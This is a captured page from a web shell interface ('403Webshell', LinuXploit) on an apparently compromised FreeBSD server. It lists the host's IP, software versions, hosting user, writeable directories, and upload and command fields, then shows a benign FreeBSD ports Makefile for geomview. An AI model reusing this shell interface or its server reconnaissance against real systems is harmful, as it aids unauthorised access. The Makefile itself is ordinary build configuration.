403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.216.89
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/graphics/geomview/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/graphics/geomview/Makefile
PORTNAME=	geomview
PORTVERSION=	1.9.5
PORTREVISION=	4
CATEGORIES=	graphics education
MASTER_SITES=	SF

MAINTAINER=	ports@FreeBSD.org
COMMENT=	Interactive viewer for 3- and 4-D geometric objects
WWW=		http://www.geomview.org/

LICENSE=	LGPL21+ # COPYING mentions LGPL21, source files LGPL20
LICENSE_FILE=	${WRKSRC}/COPYING

RUN_DEPENDS=	xdg-open:devel/xdg-utils

USES=		cpe gl libtool makeinfo motif tar:bzip2
USE_GL=		glu
GNU_CONFIGURE=	yes
CONFIGURE_ARGS=	--with-htmlbrowser=xdg-open --with-pdfviewer=xdg-open \
		--with-motif=${LOCALBASE} --with-opengl=${LOCALBASE}
INSTALL_TARGET=	install-strip
USE_LDCONFIG=	yes

PLIST_SUB=	VERSION="${PORTVERSION}"

INFO=		geomview

OPTIONS_DEFINE=		DOCS EXAMPLES MOTION_AVG
MOTION_AVG_DESC=	Experimental motion averaging code
MOTION_AVG_CONFIGURE_ENABLE=	motion-averaging

post-patch:
	@${REINPLACE_CMD} -e \
		'/^install-data-am:/s|install-info-am|| ; \
		 /install-man/s|install-nobase_infoimgDATA||' \
		${WRKSRC}/doc/Makefile.in

post-build:
	@(cd ${WRKSRC}/doc && makeinfo --no-split --no-validate \
		-o geomview.info geomview.texi)

post-install:
	(cd ${WRKSRC}/doc && ${INSTALL_DATA} geomview.info \
		${STAGEDIR}${PREFIX}/${INFO_PATH})

post-install-DOCS-on:
	@${MKDIR} ${STAGEDIR}${DOCSDIR}
	(cd ${WRKSRC} && ${INSTALL_DATA} README \
		${STAGEDIR}${DOCSDIR})

post-install-EXAMPLES-on:
	@${MKDIR} ${STAGEDIR}${EXAMPLESDIR}
	(cd ${WRKSRC}/doc && ${INSTALL_DATA} *.c *.tcl \
		${STAGEDIR}${EXAMPLESDIR})

.include <bsd.port.mk>

Youez - 2016 - github.com/yon3zu
LinuXploit